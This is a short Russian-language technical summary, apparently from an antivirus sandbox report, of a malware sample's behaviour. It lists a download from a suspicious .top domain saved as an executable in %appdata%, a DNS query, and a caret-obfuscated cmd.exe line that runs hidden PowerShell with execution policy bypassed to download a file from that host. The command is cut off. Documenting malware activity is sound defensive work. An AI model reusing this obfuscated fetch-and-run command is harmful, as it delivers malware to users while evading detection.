Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^e^Rs^HeLl.ExE ^-^eX^ec^uti^ONpolicY BY^p^As^s ^-nopRo^FILe ^-^w^in^D^owSt^y^Le ^hId^De^n (NEW^-^obJEct^ sy^s^tEM^.nET.We^Bcl^iEN^T^)^.do^wnL^o^Ad^F^ILE('http://newyea...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "PoW^e^Rs^HeLl.ExE ^-^eX^ec^uti^ONpolicY BY^p^As^s ^-nopRo^FILe ^-^w^in^D^owSt^y^Le ^hId^De^n (NEW^-^obJEct^ sy^s^tEM^.nET.We^Bcl^iEN^T^)^.do^wnL^o^Ad^F^ILE('http://newyea...' (со скрытым окном)